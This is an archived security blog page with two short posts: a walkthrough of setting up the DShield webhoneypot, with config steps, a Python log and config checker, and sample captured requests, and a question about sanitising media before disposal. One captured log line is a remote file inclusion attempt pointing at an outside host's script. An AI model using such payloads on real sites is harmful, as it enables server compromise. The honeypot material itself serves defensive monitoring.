
SANS ISC InfoSec Handlers Diary Blog



Webhoneypot fun

Published: 2009-03-26
Last Updated: 2009-03-27 06:42:17 UTC
by Mark Hofman (Version: 1)
1 comment(s)

37 days ago the DShield webhoneypot project released the first Alpha of the code.  I hadn't really had much time to play with it yet, but one of our readers had a challenge with his submissions, so I figured I'd better get my hands dirty.   Another reason is that there does seem to be a lot of malicious web traffic around at the moment and I wanted to grab some of it. 

So here is a quick run down of my webhoneypot experience.  

Firstly I logged into DShield and under "My Information"  I entered the Honeypot URL and ticked the "Honeypot is Active" button.

Next, to grab the code.  The code is hosted on Google and can be obtained here.  The site has install information and several releases are available: the raw code, a Debian package and a Mac OS X package.   Looking at the install instructions I decided to go with the Debian package.   (Now before you chuckle, it was because I only had about 15 minutes or so to get it done and, like many time-poor people, I like shortcuts.  It was not because the install instructions are not good.  In fact, quite the opposite.)

So I built a new Debian 5 VM on VirtualBox, which was straightforward.  I only installed a very minimal system with Apache and PHP5.  About 10 minutes gone.  

After grabbing the deb file I installed it using the "Installation with a Debian Package" instructions, which took about 3 seconds or so.   It asks you what port number you would like to use, sets up the relevant start jobs etc.  In short, it does pretty much everything for you.  Once you have completed this step you have a honeypot running on the machine, and all you need to do is edit the /opt/webhoneypot/etc/config.local file and enter your DShield userid (which will be your email address) and password (as userid=yourdshieldemailaddress and password=thepasswordfortheuserid; do not put quotes around the values).  

The final step after this was to open a browser and go to the web page.  When you hit the page you will get a message along the lines of "Check logfile for hashpassword".   This basically verifies that you have successfully connected to DShield.  You replace the password=thepasswordfortheuserid line with the hashpassword=738abc..... parameter from the log file and you are good to go. 

Revisit the web page with, for example, a robots.txt request and you will get a response.  When you look in the log file /opt/webhoneypot/logs/honey.... you will see an entry along the lines of "timestamp IP-Address Delivered Template 123".  If you see that, the log line was delivered (123 is just an example; you will see different numbers).
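As an added check (example code written for this diary, not part of the webhoneypot project), a short Python script that validates a config.local body against the rules above (no quotes around values, plaintext password gone once hashpassword is in) and pulls the "Delivered Template" entries out of the log.  The exact log line layout and all sample values below are assumed and constructed, not taken from a real install.

```python
import re

# Constructed sample of config.local; the values are placeholders, not real credentials.
SAMPLE_CONFIG = """\
userid=handler@example.invalid
password="thepasswordfortheuserid"
"""

# Constructed log lines in the shape the diary describes
# ("timestamp IP-Address Delivered Template 123"); the exact layout is assumed.
SAMPLE_LOG = """\
2009-03-26 11:11:33 192.168.22.10 Delivered Template 123
2009-03-26 11:12:36 192.168.22.10 Check logfile for hashpassword
2009-03-26 11:14:29 192.168.22.10 Delivered Template 207
"""

def check_config(text):
    """Return a list of problems found in a config.local body."""
    problems, keys = [], {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if "=" not in line:
            problems.append(f"line {lineno}: not key=value")
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        keys[key] = value
        # The diary says: do not use quotes around the values.
        if value[:1] in ('"', "'") or value[-1:] in ('"', "'"):
            problems.append(f"line {lineno}: {key} value is quoted")
    if "userid" not in keys:
        problems.append("userid missing")
    # Once hashpassword is in place the password= line is meant to be replaced, not kept.
    if "hashpassword" in keys and "password" in keys:
        problems.append("plaintext password still present alongside hashpassword")
    if "hashpassword" not in keys and "password" not in keys:
        problems.append("neither password nor hashpassword set")
    return problems

DELIVERED = re.compile(r"^(\S+ \S+) (\S+) Delivered Template (\d+)$")

def delivered_entries(log_text):
    """Return (timestamp, ip, template_id) for each line showing a successful delivery."""
    hits = []
    for line in log_text.splitlines():
        m = DELIVERED.match(line)
        if m:
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits
```

Run check_config on the file before and after swapping in hashpassword, and delivered_entries on the honeypot log to confirm submissions are actually being delivered.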

Log into DShield again and under the "My Weblogs" tab you should see your test log entries.  For example: 

Time      URL                                                                Source         Target
11:11:33  GET /robots.txt HTTP/1.1                                           192.168.22.10  202.999.999.24
11:14:29  GET /robots.txt HTTP/1.1                                           192.168.22.10  202.999.999.24
11:12:36  GET /i.php?page=http://204.2.183.2/babycaleb/picture.htm? HTTP/1.1  192.168.22.10  202.999.999.24

Total time taken, twenty minutes.  Ten minutes to install an OS onto the VM and five minutes or so because I borked my VM's network connection.  A final five minutes to install and configure the Honeypot.  

The guys on the team have done a great job.  If you have a spare IP this is a great way to contribute.  Give it a go. 

Mark H - Shearwater 

For those of you who are students and think honeypots might be something you are interested in, check out the Honeynet Project Google Summer of Code page http://www.honeynet.org/gsoc .  


Sanitising media

Published: 2009-03-26
Last Updated: 2009-03-26 21:05:07 UTC
by Mark Hofman (Version: 1)
0 comment(s)

Pat asked an interesting question.  He, like many of us, has the requirement to make sure that information doesn't accidentally leave the organisation on equipment that is being disposed of.  

To stop this many of us will have procedures to sanitise or destroy media, but what exactly are you targeting?   Hard disks, CDs, DVDs and USB/flash drives are all the obvious ones.  BlackBerries, iPhones or MP3 players are less obvious devices. However, what else should you cleanse or even destroy?

Here are some things that I thought of that could be included: 

  • Hard disks from Printers
  • Printer drums
  • Cameras
  • Digital photo Frames

Let me know what other devices you sanitise before leaving the organisation. 

Mark H 
